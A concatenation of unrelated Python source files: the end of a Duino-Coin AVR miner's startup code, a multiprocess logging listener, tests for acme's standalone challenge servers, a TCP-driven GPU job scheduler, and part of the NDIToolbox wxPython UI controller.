            + ')',
            'error')
        debug_output('Error reading configfile: ' + str(e))
        sleep(10)
        _exit(1)
    try:
        # Display greeting message
        greeting()
        debug_output('greeting displayed')
    except Exception as e:
        debug_output('Error displaying greeting message: ' + str(e))
    try:
        # Start donation thread
        donate()
    except Exception as e:
        debug_output('Error launching donation thread: ' + str(e))
    try:
        # Launch avr duco mining threads - one per configured serial port
        for port in avrport:
            thrThread(
                target=mine_avr,
                args=(port,)).start()
    except Exception as e:
        debug_output('Error launching AVR thread(s): ' + str(e))
    if discord_presence == "y":
        try:
            # Discord rich presence threads
            init_rich_presence()
            thrThread(
                target=update_rich_presence).start()
        except Exception as e:
            debug_output('Error launching Discord RPC thread: ' + str(e))
|
multiprocess_logger.py | import logging
import logging.handlers
import traceback
from typing import Callable, Tuple
import multiprocessing as mp
class MultiProcessLoggerListener:
    """
    Using an independent process to write logs, suitable for multiprocess logging.

    Worker processes attach a QueueHandler that feeds records into ``queue``;
    the listener process drains the queue and dispatches each record, e.g.
    ```
    name = multiprocessing.current_process().name
    h = logging.handlers.QueueHandler(listener.queue)
    logger = logging.getLogger("worker_process.{}".format(name))
    logger.addHandler(h)
    logger.setLevel(logging.DEBUG)
    ```
    """
    def __init__(self, logger_constructor: Callable[[], Tuple[logging.Logger, str]], mp_context="spawn"):
        """
        Args:
            logger_constructor: function to create the root logger; it is
                called inside the listener process so the real handlers
                (files, streams, ...) are owned by that process.
            mp_context: multiprocessing start method ("spawn", "fork", ...).
        """
        ctx = mp.get_context(mp_context)
        self._queue = ctx.Queue(-1)  # unbounded record queue
        self._logger_constructor = logger_constructor
        # BUG FIX: the listener was previously created with the default
        # mp.Process, ignoring the start method requested via mp_context.
        self.listener = ctx.Process(target=self.listen, name="listener")
        self.listener.start()

    def listen(self):
        """Listener-process main loop: handle records until a None sentinel."""
        root, _ = self._logger_constructor()
        root.info("Starting...")
        while True:
            try:
                record = self._queue.get()
                if record is None:  # sentinel pushed by stop()
                    root.info("Stopped")
                    break
                logger = logging.getLogger(record.name)
                logger.handle(record)
            except Exception as e:
                tb = traceback.format_exc()
                root.fatal("Exception:\n{}\nTraceback:\n{}".format(e, tb))

    @property
    def queue(self) -> mp.Queue:
        # Queue to hand to logging.handlers.QueueHandler in worker processes.
        return self._queue

    def stop(self):
        """
        Stop listener process and join
        """
        self._queue.put_nowait(None)
        self.join()

    def join(self):
        """
        Wait for listener stop
        """
        self.listener.join()

    def get_logger(self, name: str = None, level: int = logging.INFO):
        """Return a logger whose records are routed to the listener queue."""
        logger = logging.getLogger(name)
        handler = logging.handlers.QueueHandler(self._queue)
        logger.addHandler(handler)
        logger.setLevel(level)
        return logger

    def __del__(self):
        # Best-effort shutdown: guard against partially constructed
        # instances and errors during interpreter teardown.
        try:
            self.stop()
        except Exception:
            pass
|
standalone_test.py | """Tests for acme.standalone."""
import os
import shutil
import threading
import tempfile
import time
import unittest
from six.moves import http_client # pylint: disable=import-error
from six.moves import socketserver # pylint: disable=import-error
import requests
from acme import challenges
from acme import crypto_util
from acme import errors
from acme import jose
from acme import test_util
class TLSServerTest(unittest.TestCase):
    """Tests for acme.standalone.TLSServer."""

    def test_bind(self):  # pylint: disable=no-self-use
        # Server must bind+activate on an ephemeral port and close cleanly
        # without ever serving a request.
        from acme.standalone import TLSServer
        server = TLSServer(
            ('', 0), socketserver.BaseRequestHandler, bind_and_activate=True)
        server.server_close()  # pylint: disable=no-member
class TLSSNI01ServerTest(unittest.TestCase):
    """Test for acme.standalone.TLSSNI01Server."""

    def setUp(self):
        # Serve a self-signed key/cert pair for the SNI name b'localhost'
        self.certs = {
            b'localhost': (test_util.load_pyopenssl_private_key('rsa512_key.pem'),
                           # pylint: disable=protected-access
                           test_util.load_cert('cert.pem')._wrapped),
        }
        from acme.standalone import TLSSNI01Server
        self.server = TLSSNI01Server(("", 0), certs=self.certs)
        # pylint: disable=no-member
        self.thread = threading.Thread(target=self.server.serve_forever)
        self.thread.start()

    def tearDown(self):
        self.server.shutdown()  # pylint: disable=no-member
        self.thread.join()

    def test_it(self):
        # Probing with SNI b'localhost' must return the configured cert
        host, port = self.server.socket.getsockname()[:2]
        cert = crypto_util.probe_sni(b'localhost', host=host, port=port, timeout=1)
        self.assertEqual(jose.ComparableX509(cert),
                         jose.ComparableX509(self.certs[b'localhost'][1]))
class HTTP01ServerTest(unittest.TestCase):
    """Tests for acme.standalone.HTTP01Server."""

    def setUp(self):
        # Account key used to build and verify challenge responses
        self.account_key = jose.JWK.load(
            test_util.load_vector('rsa1024_key.pem'))
        self.resources = set()
        from acme.standalone import HTTP01Server
        self.server = HTTP01Server(('', 0), resources=self.resources)
        # pylint: disable=no-member
        self.port = self.server.socket.getsockname()[1]
        self.thread = threading.Thread(target=self.server.serve_forever)
        self.thread.start()

    def tearDown(self):
        self.server.shutdown()  # pylint: disable=no-member
        self.thread.join()

    def test_index(self):
        # Root path serves the standalone banner page
        response = requests.get(
            'http://localhost:{0}'.format(self.port), verify=False)
        self.assertEqual(
            response.text, 'ACME client standalone challenge solver')
        self.assertTrue(response.ok)

    def test_404(self):
        response = requests.get(
            'http://localhost:{0}/foo'.format(self.port), verify=False)
        self.assertEqual(response.status_code, http_client.NOT_FOUND)

    def _test_http01(self, add):
        # Build an HTTP-01 challenge, optionally register it with the
        # server, then report whether simple_verify() succeeds.
        chall = challenges.HTTP01(token=(b'x' * 16))
        response, validation = chall.response_and_validation(self.account_key)
        from acme.standalone import HTTP01RequestHandler
        resource = HTTP01RequestHandler.HTTP01Resource(
            chall=chall, response=response, validation=validation)
        if add:
            self.resources.add(resource)
        return resource.response.simple_verify(
            resource.chall, 'localhost', self.account_key.public_key(),
            port=self.port)

    def test_http01_found(self):
        self.assertTrue(self._test_http01(add=True))

    def test_http01_not_found(self):
        self.assertFalse(self._test_http01(add=False))
class TestSimpleTLSSNI01Server(unittest.TestCase):
    """Tests for acme.standalone.simple_tls_sni_01_server."""

    def setUp(self):
        # mirror ../examples/standalone
        # The CLI server discovers certs from <cwd>/<name>/{cert,key}.pem
        self.test_cwd = tempfile.mkdtemp()
        localhost_dir = os.path.join(self.test_cwd, 'localhost')
        os.makedirs(localhost_dir)
        shutil.copy(test_util.vector_path('cert.pem'), localhost_dir)
        shutil.copy(test_util.vector_path('rsa512_key.pem'),
                    os.path.join(localhost_dir, 'key.pem'))
        from acme.standalone import simple_tls_sni_01_server
        self.port = 1234
        self.thread = threading.Thread(
            target=simple_tls_sni_01_server, kwargs={
                'cli_args': ('xxx', '--port', str(self.port)),
                'forever': False,
            },
        )
        self.old_cwd = os.getcwd()
        os.chdir(self.test_cwd)
        self.thread.start()

    def tearDown(self):
        os.chdir(self.old_cwd)
        self.thread.join()
        shutil.rmtree(self.test_cwd)

    def test_it(self):
        # Retry probing while the server thread starts up (at most ~5s)
        max_attempts = 5
        while max_attempts:
            max_attempts -= 1
            try:
                cert = crypto_util.probe_sni(b'localhost', b'0.0.0.0', self.port)
            except errors.Error:
                self.assertTrue(max_attempts > 0, "Timeout!")
                time.sleep(1)  # wait until thread starts
            else:
                self.assertEqual(jose.ComparableX509(cert),
                                 test_util.load_cert('cert.pem'))
                break
if __name__ == "__main__":
unittest.main() # pragma: no cover
|
main.py | import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()

# Job queue: 50 jobs numbered 1..50
queue = []
for i in range(50):
    queue.append(i+1)
# Poisson arrivals: each job arrives on average 30s after the previous one
queue_dict = {}
arrival_time = 0
for item in queue:
    arrival_time += np.random.poisson(30)
    queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {}  # {'49': time1, '15': time2...}
JCT = {}  # job completion time in seconds, keyed by job id string
for item in queue:
    JCT[str(item)] = 0
overhead = {}  # initialize so that every job starts with 0s overhead time
for item in queue:
    overhead[str(item)] = 0
ovhd_start = {}  # initialize this to 0 as well
for item in queue:
    ovhd_start[str(item)] = 0
num_mig = {}  # initialize migration time to 0
for item in queue:
    num_mig[str(item)] = 0
queue_start = {}  # initialize this to 0 as well
for item in queue:
    queue_start[str(item)] = 0
queue_time = {}  # initialize this to 0 as well
for item in queue:
    queue_time[str(item)] = 0
index = 0
V100_cap = 4  # number of V100 GPUs available
V100_used = 0
qualified_jobs = 0
V100_job = {}  # gpu index (str) -> job id (str) or 'idle'
for i in range(4):
    V100_job[str(i)] = 'idle'
qualified_job = []
pc_job = []  # list of jobs that are pratically completed
V100_node = 'd1021'
host_node = 'c0192'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30  # make decision every 30s
# NOTE(review): comment said "600s or 10min" but the value is 300s (5min) -
# confirm the intended qualification threshold.
QUALIFY_TIME = 300
def send_signal(node, cmd):
    """Send a control command to the daemon on `node` over TCP and block
    until it acknowledges with 'success'.

    Args:
        node: hostname of the worker/GPU node.
        cmd: command string, e.g. 'start 35 gpu 6' or 'save 35'.
    """
    # Create a TCP/IP socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # NOTE(review): both branches of this ternary are 10001 - presumably the
    # non-V100 node was meant to use a different port; confirm intended value.
    port = 10001 if node == V100_node else 10001
    # Connect the socket to the port where the server is listening
    server_address = (node, int(port))
    print('connecting to {} port {}'.format(*server_address))
    try:
        # BUG FIX: connect() is now inside try/finally so the socket is
        # always closed, even when the connection attempt raises.
        sock.connect(server_address)
        # Send data
        message = cmd.encode('utf-8')  # b'save 35' / b'start 35 gpu 6'
        print('sending {!r}'.format(message))
        sock.sendall(message)
        # Poll until the daemon acknowledges the command
        while True:
            data = sock.recv(32)
            if 'success' in data.decode('utf-8'):
                print('received {!r}'.format(data))
                break
            else:
                print('waiting for success signal')
                time.sleep(1)
    finally:
        #print('closing socket')
        sock.close()
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
# start job
def start_job(node, gpu, job):
    """Ask *node* to launch *job* on GPU *gpu*."""
    send_signal(node, 'start {} gpu {}'.format(job, gpu))
############### first clear finish status of all jobs ####################
# Per-job status tables updated by the worker reports arriving over TCP,
# keyed 'job1'..'job50'. (The original used three identical init loops.)
pid_dict = {'job' + str(i + 1): 0 for i in range(50)}        # worker pid bookkeeping
ckpt_qual_dict = {'job' + str(i + 1): 0 for i in range(50)}  # 1 once a job reports ckpt_qual
finish_dict = {'job' + str(i + 1): 0 for i in range(50)}     # 1 once a job reports finish
#################### background thread running TCP socket ########################
def thread_function():
    """Daemon thread: accept worker status reports and update the global
    bookkeeping tables.

    Each report is a short message '<jobname> <kind>' where kind is 'param',
    'ckpt_qual' or 'finish'; every report is acknowledged with b'success'.
    """
    # here listen on the socket
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = (host_node, 10002)
    print('starting up on {} port {}'.format(*server_address))
    sock.bind(server_address)
    sock.listen(5)
    while True:
        # Wait for a connection
        connection, client_address = sock.accept()
        try:
            while True:
                data = connection.recv(32)
                if data:
                    data_str = data.decode('utf-8')
                    if 'param' in data_str:
                        pass
                    elif 'ckpt_qual' in data_str:
                        global ckpt_qual_dict
                        job_name = data_str.split(' ')[0]
                        ckpt_qual_dict[job_name] = 1
                        # move overhead profiling here
                        global ovhd_start
                        global overhead
                        job = job_name.replace('job','')
                        # Close the overhead interval opened when the job was
                        # (re)started; ovhd_start == 0 means no interval is open.
                        if ovhd_start[job] != 0:
                            if ckpt_qual_dict[job_name] == 1:
                                overhead[job] += int(time.time() - ovhd_start[job])
                                ovhd_start[job] = 0
                    elif 'finish' in data_str:
                        global finish_dict
                        job_name = data_str.split(' ')[0]
                        job = job_name.replace('job', '')
                        finish_dict[job_name] = 1
                        # JCT = wall-clock seconds since the job was first started.
                        JCT[job] = int(time.time() - job_start[job])
                    print('received ' + data_str)
                    connection.sendall(b'success')
                    #time.sleep(5)
                else:
                    break
        finally:
            connection.close()
# daemon=True so the listener dies with the main scheduler loop.
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
    # termination condition:
    # all the jobs have finished
    ################### check for finished jobs on V100 ##############################
    # Free any GPU slot whose job has reported 'finish' via the TCP thread.
    for gpu, job in V100_job.items():
        if job != 'idle':
            if finish_dict['job'+job] == 1:
                V100_used -= 1
                V100_job[gpu] = 'idle'
                print('V100 finished job: ' + job)
    ################ check run time of current V100 job, update qualified_job #################
    # Jobs running at least QUALIFY_TIME become promotion candidates.
    for job in list(V100_job.values()):
        if job not in qualified_job and job != 'idle':
            runtime = int(time.time() - job_start[job])
            if runtime >= QUALIFY_TIME:
                qualified_job.append(job)
                print('job' + job + ' has been qualified for promotion')
    ################ make promotion decisions ########################
    V100_free = V100_cap - V100_used
    ################ submit new jobs to vacant V100 GPUs ############################
    # check if there are vacant V100s
    ## yes: submit jobs from queue
    ## no: do nothing
    if V100_used < V100_cap:
        V100_free = V100_cap - V100_used
        for i in range(V100_free):
            time_passed = int(time.time() - queue_timer)
            if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
                job_new = str(queue[index])
                for gpu, job in V100_job.items():
                    if job == 'idle': # schedule new job here if idle
                        start_job(V100_node, gpu, job_new)
                        V100_job[gpu] = job_new
                        job_start[job_new] = time.time()
                        index += 1
                        V100_used += 1
                        time.sleep(5) # don't communicate too often
                        break  # one slot per new job; outer loop may place more
    ############### wait for next iteration
    time.sleep(INTERVAL)
    ################ check if termination condition is met ################
    # Done when every slot is idle and every queued job has been dispatched.
    V100_idle_num = sum(value == 'idle' for value in V100_job.values())
    if V100_idle_num == V100_cap and index == len(queue):
        print('all jobs are finished!')
        break
# Aggregate stats: fold the mean of each table into the table itself.
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
print('finished all runs')
# Output file names for this test case.
JCT_name = testcase + '_JCT.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
# Dump every bookkeeping table to its JSON result file.
results = (
    (JCT_name, JCT),
    (overhead_name, overhead),
    (num_mig_name, num_mig),
    (ckpt_qual_name, ckpt_qual_dict),
    (finish_name, finish_dict),
)
for out_name, table in results:
    with open(out_name, 'w') as out_fp:
        json.dump(table, out_fp, sort_keys=True, indent=4)
|
mainui_ctrl.py | """ mainui_ctrl.py - controller for mainui
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from models import mainmodel
from models import dataio
from models import workerthread
import views.plotwindow as plotwindow
import views.preview_window as preview_window
import views.dialogs as dlg
from views import podtk
from views import adatk
from views import DSF_podtk
import controllers.pathfinder as pathfinder
import controllers.open_file as open_file
import wx
import gc
import imp
import os.path
import Queue
import sys
import webbrowser
module_logger = mainmodel.get_logger(__name__)
class MainUIController(object):
"""Controller for the main user interface"""
    def __init__(self, view):
        """Bind the controller to its *view* and build the model."""
        self.view = view
        self.init_model()
    def init_model(self):
        """Creates and connects the model, ensures data paths are available"""
        self.model = mainmodel.MainModel(self)
    def verify_userpath(self):
        """Ensures the user's data folder is available"""
        # First run (or deleted folder): prompt the user for a data location.
        if not os.path.exists(pathfinder.user_path()):
            module_logger.info("Created user data folder")
            self.set_userpath()
        self.model.check_user_path()
        self.model.copy_system_plugins()
    def verify_imports(self):
        """Ensures third-party dependencies are installed; shows
        error dialog and exits if a module is missing."""
        # Frozen builds bundle their dependencies, so the check is only
        # meaningful when running from source.
        if not hasattr(sys, 'frozen'):
            module_logger.info("Not frozen, checking module dependencies.")
            dependencies = ['h5py', 'dicom', 'matplotlib', 'numpy', 'scipy']
            for module in dependencies:
                try:
                    # imp.find_module locates the module without importing it.
                    imp.find_module(module)
                except ImportError: # Module not installed / not found
                    module_logger.error("Module {0} was not found, aborting.".format(module))
                    msg = ' '.join(["Unable to find the '{0}' module.".format(module),
                                    "Please ensure the module is installed and",
                                    "restart NDIToolbox."])
                    err_dlg = wx.MessageDialog(self.view, message=msg,
                                               caption="{0} Module Not Found".format(module), style=wx.ICON_ERROR)
                    err_dlg.ShowModal()
                    err_dlg.Destroy()
                    sys.exit(0)
        else:
            module_logger.info("Frozen, skipping module dependency checks.")
    def get_icon_bmp(self):
        """Returns a PNG wx.Bitmap of the application's
        default icon"""
        icon_bmp_path = pathfinder.icon_path()
        return wx.Bitmap(icon_bmp_path, wx.BITMAP_TYPE_PNG)
    def get_icon(self):
        """Returns a wx.Icon of the application's
        default icon"""
        # Windows gets a true .ico file; other platforms build the icon
        # from the PNG bitmap.
        if sys.platform != 'win32':
            return wx.IconFromBitmap(self.get_icon_bmp())
        icon = wx.Icon(pathfinder.winicon_path(), wx.BITMAP_TYPE_ICO)
        return icon
    def get_bitmap(self, bitmap_name):
        """Returns a wx.Bitmap instance of the given bitmap's name if
        found in the app's resources folder."""
        full_bitmap_path = os.path.join(pathfinder.bitmap_path(), bitmap_name)
        if os.path.exists(full_bitmap_path):
            return wx.Bitmap(name=full_bitmap_path, type=wx.BITMAP_TYPE_PNG)
        # Caller is expected to handle a missing bitmap.
        return None
def set_thumb(self, panel, data_file, enable=True):
"""Sets the bitmap contents of the specified panel to a thumbnail
plot of the selected data file, or a placeholder bitmap if thumbnails
are disabled."""
if enable:
panel.plot_thumb(data_file)
else:
panel.plot_blank()
def get_default_position(self):
"""Returns the default (x, y) coordinates of the
main application window"""
coordinates = [0, 0]
cfg_coordinates = self.model.get_coords()
# Basic sanity check - ensure negative dimensions
# weren't provided
if cfg_coordinates:
if cfg_coordinates[0] > 0:
coordinates[0] = cfg_coordinates[0]
if cfg_coordinates[1] > 0:
coordinates[1] = cfg_coordinates[1]
return coordinates
def get_window_size(self):
"""Returns the window size of the main application window from the configuration file"""
window_size = [300, 600]
cfg_win_size = self.model.get_window_size()
return cfg_win_size
def get_preview_state(self):
"""Returns the current enable/disable thumbnail
previews setting from the application's config file"""
preview_state = self.model.get_preview_state()
if preview_state is None:
return True
return preview_state
def open_url(self, url):
"""Opens the specified URL in the user's default web browser."""
if url is not None:
webbrowser.open_new_tab(url)
    # Event Handlers
    def on_quit(self, evt):
        """Handles the Quit event"""
        # Persist window geometry before tearing down the AUI manager.
        self.model.set_coords(list(self.view.GetPosition()))
        self.model.set_window_size(list(self.view.GetClientSizeTuple()))
        self.view._mgr.UnInit()
        self.view.Destroy()
    def on_window_destroy(self, evt):
        """Attempts to free up memory every time a window is destroyed"""
        # wxPython seems to require a delay before calling garbage collection
        wx.CallLater(1000, gc.collect)
    def on_help(self, evt):
        """Handles request to open help documents"""
        self.open_url(os.path.join(pathfinder.docs_path(), 'index.html'))
    def on_quickstart(self, evt):
        """Handles request to open Getting Started guide"""
        self.open_url(os.path.join(pathfinder.docs_path(), 'quickstart.html'))
    def on_plugins(self, evt):
        """Handles request to open guide to plugins for end users"""
        self.open_url(os.path.join(pathfinder.docs_path(), 'plugins.html'))
    def on_plugins_dev(self, evt):
        """Handles request to open guide to plugins for developers"""
        self.open_url(os.path.join(pathfinder.docs_path(), 'plugins_developers.html'))
    def on_plugins_samples(self, evt):
        """Handles request to open examples of NDIToolbox plugins"""
        self.open_url(os.path.join(pathfinder.docs_path(), 'plugins_samples.html'))
    def on_about(self, evt):
        """Handles the About This Program event"""
        project_logo = os.path.join(pathfinder.icons_path(), 'nditoolbox.png')
        project_msg = ' '.join(
            ("NDIToolbox (TM) Copyright (c) 2013 TRI/Austin, Inc. Developed under TRI Project A7117.",
             "\n\nUse of this software is governed by the terms outlined in the license.txt file.",
             "\n\nProject Manager: David Forsyth",
             "\nLead Developer: Chris Coughlin")
        )
        about_project_logo_dlg = dlg.AboutDialog(parent=self.view, title="About This Program",
                                                 msg=project_msg, url="http://www.nditoolbox.com",
                                                 logobmp_fname=project_logo)
        about_project_logo_dlg.ShowModal()
        about_project_logo_dlg.Destroy()
    def on_about_license(self, evt):
        """Handles the License Information event"""
        license_file = os.path.join(pathfinder.app_path(), 'license.txt')
        with open(license_file, 'rb') as fidin:
            license = fidin.readlines()
        license_dlg = dlg.TextDisplayDialog(parent=self.view, text=''.join(license),
                                            title="License Information",
                                            style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
        license_dlg.Show()
    def on_about_tri(self, evt):
        """Handles the About TRI event"""
        tri_logo = os.path.join(pathfinder.bitmap_path(), "tri_austin_logo.png")
        tri_msg = ' '.join(
            ("Texas Research Institute Austin, Inc. (TRI/Austin) is TRI's flagship company",
             "and conducts materials research and development projects.\n\nTRI is committed to",
             "providing the highest quality materials science products and services."))
        about_tri_dlg = dlg.AboutDialog(parent=self.view, title="About TRI",
                                        msg=tri_msg,
                                        url="http://www.tri-austin.com",
                                        logobmp_fname=tri_logo)
        about_tri_dlg.ShowModal()
        about_tri_dlg.Destroy()
    def on_about_icons(self, evt):
        """Handles the About Icons event"""
        # Shows attribution for the Axialis icon set.
        axialis_logo = os.path.join(pathfinder.bitmap_path(), "axialis_logo.png")
        axialis_msg = ' '.join(("Some icons courtesy Axialis Software and the",
                                "Axialis Team, and were created by",
                                "Axialis IconWorkshop."))
        about_axialisicons_dlg = dlg.AboutDialog(parent=self.view, title="About Axialis Icons",
                                                 msg=axialis_msg,
                                                 url="http://www.axialis.com",
                                                 logobmp_fname=axialis_logo)
        about_axialisicons_dlg.ShowModal()
        about_axialisicons_dlg.Destroy()
def on_display_log(self, evt):
"""Handles request to display application log"""
try:
wx.BeginBusyCursor()
log_path = pathfinder.log_path()
default_log_contents = ['Log is currently empty.']
log_contents = []
if os.path.exists(log_path):
with open(log_path, "r") as fidin:
log_contents = fidin.readlines()
if len(log_contents) is 0:
log_contents = default_log_contents
text_display_dlg = dlg.TextDisplayDialog(parent=self.view, text=log_contents,
title='NDIToolbox Log - {0}'.format(log_path),
wrap=False,
style=wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER)
text_display_dlg.Show()
finally:
wx.EndBusyCursor()
    def on_clear_log(self, evt):
        """Handles request to delete the application log."""
        log_path = pathfinder.log_path()
        if os.path.exists(log_path):
            confirm_deletion_dlg = wx.MessageDialog(parent=self.view.parent,
                                                    caption="Delete Log?",
                                                    message="Are you sure you want to delete the log?",
                                                    style=wx.OK | wx.CANCEL)
            if confirm_deletion_dlg.ShowModal() == wx.ID_OK:
                try:
                    mainmodel.clear_log()
                except WindowsError: # File in use (Windows)
                    # NOTE(review): WindowsError is only defined on Windows; on
                    # other platforms a failing clear_log() would surface a
                    # NameError here instead. Confirm target platforms.
                    err_msg = "Unable to delete log-Windows reports the file is in use."
                    err_dlg = wx.MessageDialog(self.view, message=err_msg,
                                               caption="Unable To Delete Log", style=wx.ICON_ERROR)
                    err_dlg.ShowModal()
                    err_dlg.Destroy()
    def on_data_select(self, evt):
        """Handles a change in data file selection by providing a preview plot
        of the data"""
        self.set_thumb(panel=self.view.thumbnail_panel, data_file=self.view.data_panel.data,
                       enable=self.view.toolbar.GetToolState(self.view.gen_bitmaps_tool.GetId()))
        # Data-specific tools only make sense when a file is selected.
        if self.view.data_panel.data:
            self.view.enable_data_tools()
        else:
            self.view.disable_data_tools()
    def on_preview_toggle(self, evt):
        """Handles toggling data thumbnail plot previews"""
        preview_state = self.view.toolbar.GetToolState(self.view.gen_bitmaps_tool.GetId())
        if preview_state:
            self.set_thumb(panel=self.view.thumbnail_panel, data_file=self.view.data_panel.data,
                           enable=preview_state)
        self.view.enable_preview_panel(preview_state)
        # Remember the setting across sessions.
        self.model.set_preview_state(preview_state)
    def on_refresh_data(self, evt):
        """Handles request to update contents of data folder"""
        self.refresh_data()
    def refresh_data(self):
        """Instructs UI to update list of data folder contents"""
        # Drop cached thumbnails so previews are regenerated for new files.
        self.model.remove_thumbs()
        self.view.data_panel.populate()
    def on_add_data(self, evt):
        """Handles request to add data to data folder"""
        # Build the file-type filter string shown in the wx file dialog.
        default_wildcard = "NDIToolbox Files (*.hdf5)|*.hdf5"
        allfiles_wildcard = "All Files (*.*)|*.*"
        img_wildcards = "Image Files|(*.bmp;*.dcx;*.eps;*.gif;*.im;*.imt;*.jpg;*.jpeg;*.pcx;*.png;*.ppm;*.psd;*.sgi;*.tga;*.tiff;*.xpm)"
        txt_wildcards = "Text Files|*.txt;*.csv;*.dat;*.tab;*.asc"
        winspect_wildcard = "Winspect 6/7 CScans |*.sdt"
        utwin_wildcard = "UTWin CScans |*.csc"
        dicom_wildcard = "DICOM/DICONDE |*.dcm"
        wildcards = "|".join([default_wildcard, img_wildcards, txt_wildcards, winspect_wildcard,
                              utwin_wildcard, dicom_wildcard, allfiles_wildcard])
        file_dlg = wx.FileDialog(parent=self.view.parent, message='Please specify a data file',
                                 wildcard=wildcards, style=wx.FD_OPEN)
        if file_dlg.ShowModal() == wx.ID_OK:
            self.select_import_function(file_dlg.GetPath())
    def select_import_function(self, file_to_import):
        """Asks the user to specify the file format to use to import the given data file"""
        import_dlg = dlg.ImportDataDialog(parent=self.view, file_name=file_to_import)
        try:
            wx.BeginBusyCursor()
            if import_dlg.ShowModal() == wx.ID_OK:
                # Dispatch to the importer matching the user's file-type choice.
                file_type = import_dlg.get_selected_filetype()
                if file_type == 'hdf5': # Native NDIToolbox HDF5
                    self.import_hdf5(file_to_import)
                elif file_type == 'text': # Delimited Text
                    self.import_text(file_to_import)
                elif file_type == 'image': # Bitmaps
                    self.import_image(file_to_import)
                elif file_type == 'utwin_cscan': # UTWin Cscan (.csc)
                    self.import_csc(file_to_import)
                elif file_type == 'winspect7': # Winspect 6 or 7 (.sdt)
                    self.import_sdt(file_to_import)
                elif file_type == 'dicom': # DICOM/DICONDE (.dcm)
                    self.import_dicom(file_to_import)
        finally:
            import_dlg.Destroy()
            wx.EndBusyCursor()
    def on_browse_userpath(self, evt):
        """Handles request to browse to the default userpath"""
        try:
            open_file.open_file(pathfinder.user_path())
        except IOError: # file not found
            module_logger.error("User folder {0} not found.".format(pathfinder.user_path()))
            err_msg = "Unable to find folder '{0}'.\nPlease ensure the folder exists.".format(pathfinder.user_path())
            err_dlg = wx.MessageDialog(self.view, message=err_msg,
                                       caption="Unable To Open Folder", style=wx.ICON_ERROR)
            err_dlg.ShowModal()
            err_dlg.Destroy()
        except OSError as err: # other OS error
            module_logger.error("Unidentified OS error {0}".format(err))
            err_msg = "Unable to browse to data folder, error reported was:\n{0}".format(err)
            err_dlg = wx.MessageDialog(self.view, message=err_msg,
                                       caption="Unable To Open Folder", style=wx.ICON_ERROR)
            err_dlg.ShowModal()
            err_dlg.Destroy()
    def on_choose_userpath(self, evt):
        """Handles request to set the default userpath"""
        self.set_userpath()
def set_userpath(self):
""" Prompts user to set a default path for storing user data """
try:
current_user_path = pathfinder.user_path()
path_dlg = wx.DirDialog(parent=self.view.parent, message="Please specify a data folder",
defaultPath=current_user_path)
if path_dlg.ShowModal() == wx.ID_OK:
new_user_path = path_dlg.GetPath()
self.model.migrate_user_path(new_user_path)
self.refresh_data()
finally:
path_dlg.Destroy()
    def on_choose_loglevel(self, evt):
        """Handles request to set the log level severity"""
        available_log_levels = mainmodel.available_log_levels
        # NOTE(review): indexing with [0] assumes key 0 exists (or that this
        # is a sequence) -- confirm the shape of available_log_levels.
        current_log_level_str = available_log_levels[0]
        log_level_strs = available_log_levels.keys()
        current_log_level = mainmodel.get_loglevel()
        # Map the numeric level back to its display string (Python 2 dict API).
        for log_str, log_lvl in available_log_levels.iteritems():
            if log_lvl == current_log_level:
                current_log_level_str = log_str
        choose_logging_level_dlg = wx.SingleChoiceDialog(parent=self.view, caption="Choose Logging Level",
                                                         message="Please choose an event severity level to log.",
                                                         choices=log_level_strs)
        choose_logging_level_dlg.SetSelection(log_level_strs.index(current_log_level_str))
        if choose_logging_level_dlg.ShowModal() == wx.ID_OK:
            mainmodel.set_loglevel(choose_logging_level_dlg.GetStringSelection())
        choose_logging_level_dlg.Destroy()
    def on_gc(self, evt):
        """Handles request to run a full garbage collection"""
        unreachable_objects = gc.collect()
        info_msg = "Garbage collection successful, identified {0} objects.".format(unreachable_objects)
        info_dlg = wx.MessageDialog(self.view, message=info_msg,
                                    caption="Collection Complete", style=wx.ICON_INFORMATION)
        info_dlg.ShowModal()
        info_dlg.Destroy()
def import_data(self, import_fn, *args, **kwargs):
"""Imports data using the specified function"""
exception_queue = Queue.Queue()
import_thd = workerthread.WorkerThread(exception_queue=exception_queue,
target=import_fn, *args, **kwargs)
import_thd.start()
while True:
import_thd.join(0.125)
if not import_thd.is_alive():
try:
exc_type, exc = exception_queue.get(block=False)
err_str = str(exc)
if len(err_str) == 0:
err_str = exc_type.__name__
module_logger.error("Error importing text file: {0}".format(err_str))
err_msg = "An error occurred during import:\n{0}".format(err_str)
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Import File", style=wx.ICON_ERROR)
err_dlg.ShowModal()
except Queue.Empty:
pass
gc.collect()
break
wx.GetApp().Yield()
    def choose_import_file(self, wildcard):
        """Creates a wx.FileDialog with specified wildcard for user to choose a data file to import.
        Returns full path and filename of file if OK is chosen, otherwise returns None."""
        import_dlg = wx.FileDialog(parent=self.view, message="Please specify a data file",
                                   wildcard=wildcard, style=wx.FD_OPEN)
        if import_dlg.ShowModal() == wx.ID_OK:
            return import_dlg.GetPath()
        return None
    def import_hdf5(self, file_name):
        """Copies the specified HDF5 file to the data folder"""
        # HDF5 is the native format - no conversion needed, just a copy.
        self.import_data(self.model.copy_data, args=(file_name, ))
        self.view.data_panel.populate()
    def on_import_hdf5(self, evt):
